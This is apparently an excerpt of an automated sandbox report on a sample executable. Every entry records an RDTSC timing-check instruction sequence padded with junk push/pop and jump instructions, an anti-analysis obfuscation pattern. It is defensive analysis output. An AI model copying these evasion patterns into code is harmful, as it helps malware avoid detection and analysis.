                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880AA second address: C880AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880AE second address: C880B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C862B9 second address: C862D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880B2 second address: C880B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882A0 second address: C882A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882A4 second address: C882AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2E4 second address: C8A2E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882AA second address: C882AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26F20 second address: C26F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26F24 second address: C26F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F885CB96136h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26F32 second address: C26F48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F885CCA3F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 ja 00007F885CCA3F06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26F48 second address: C26F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F885CB96136h 0x00000010 jmp 00007F885CB9613Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D2F5 second address: C8D30D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F885CCA3F0Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D30D second address: C8D31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB9613Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92DE2 second address: C92E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F885CCA3F16h 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007F885CCA3F18h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C924BF second address: C924D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F885CB96136h 0x0000000a jp 00007F885CB96136h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C924D6 second address: C924E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F885CCA3F06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C924E0 second address: C924EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F885CB96136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C924EA second address: C92522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F885CCA3F0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F885CCA3F14h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F885CCA3F06h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92671 second address: C9268A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F885CB96136h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F885CB9613Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92987 second address: C9298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9298D second address: C929AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96148h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C37B80 second address: C37BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F885CCA3F18h 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jnc 00007F885CCA3F06h 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C37BB7 second address: C37BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F885CB96138h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F885CB96144h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99EB5 second address: C99EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99EBB second address: C99EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99FF1 second address: C99FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99FF6 second address: C99FFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A190 second address: C9A196 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DEF5 second address: C9DF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96148h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF11 second address: C9DF25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97C9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF25 second address: C9DF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E511 second address: C9E51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9ED03 second address: C9ED0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9ED0B second address: C9ED46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F885CB97CA5h 0x0000000c jns 00007F885CB97C9Ch 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007F885CB97C9Ah 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9ED46 second address: C9ED53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F885CC8701Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EE6D second address: C9EE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EE76 second address: C9EE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7893F second address: C78943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78A27 second address: C78A48 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CC87016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xor dword ptr [esp], 1D0B1062h 0x00000012 mov edi, dword ptr [ebp+122D2013h] 0x00000018 push 95EBC0C5h 0x0000001d push edi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78B42 second address: C78B47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78B74 second address: C78B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78B83 second address: C78B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E81 second address: C78E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C791F6 second address: C79208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79208 second address: C7920D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79635 second address: C573A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F885CB97CA0h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F885CB97C98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1248A125h] 0x0000002e call 00007F885CB97CA8h 0x00000033 pop edi 0x00000034 nop 0x00000035 push esi 0x00000036 push eax 0x00000037 jmp 00007F885CB97C9Dh 0x0000003c pop eax 0x0000003d pop esi 0x0000003e push eax 0x0000003f jmp 00007F885CB97C9Eh 0x00000044 nop 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F885CB97C98h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Dh 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f call dword ptr [ebp+12462A10h] 0x00000065 push eax 0x00000066 push edx 0x00000067 jg 00007F885CB97CB2h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA260C second address: CA263B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F885CC87026h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2793 second address: CA2797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2797 second address: CA279D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA279D second address: CA27A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA27A2 second address: CA27C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87027h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA27C2 second address: CA27C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA27C6 second address: CA27CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA27CA second address: CA27D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2936 second address: CA294F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F885CC87021h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2A8E second address: CA2A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2A92 second address: CA2AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87022h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2AB0 second address: CA2AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2AB4 second address: CA2AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2AB8 second address: CA2ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2DCC second address: CA2DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F885CC87016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57389 second address: C573A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3085 second address: CA30B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87024h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F885CC87021h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8694 second address: CA86E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F885CB97C9Ch 0x00000010 pop ecx 0x00000011 jmp 00007F885CB97CA6h 0x00000016 jmp 00007F885CB97C9Eh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8B3B second address: CA8B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8127 second address: CA812B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA812B second address: CA816B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F885CC8701Ch 0x00000013 jp 00007F885CC87022h 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8FFA second address: CA9000 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA916F second address: CA9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA943F second address: CA9447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9447 second address: CA944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEDE3 second address: CAEDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEDE9 second address: CAEDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEDEF second address: CAEDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEDF9 second address: CAEDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD8E8 second address: CAD90D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F885CB97C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADA61 second address: CADA66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADD68 second address: CADD74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F885CB97C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADD74 second address: CADD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE27E second address: CAE289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE289 second address: CAE29A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE53B second address: CAE54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F885CB97C96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE54C second address: CAE550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE68E second address: CAE698 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F885CB97C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE829 second address: CAE859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007F885CC8702Ah 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F885CC8701Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD5D4 second address: CAD5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F885CB97C9Bh 0x00000010 jmp 00007F885CB97CA5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5BE7 second address: CB5C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885CC87022h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F885CC87020h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F885CC87016h 0x0000001d pushad 0x0000001e popad 0x0000001f jng 00007F885CC87016h 0x00000025 popad 0x00000026 push ebx 0x00000027 jo 00007F885CC87016h 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5C2F second address: CB5C34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5C34 second address: CB5C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F885CC87022h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7DB9 second address: CB7DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7DBD second address: CB7DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC8701Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7DD0 second address: CB7DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F885CB97C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0252 second address: CC026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC051D second address: CC055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F885CB97CA1h 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F885CB97C96h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC055A second address: CC055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC055E second address: CC0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0564 second address: CC0569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
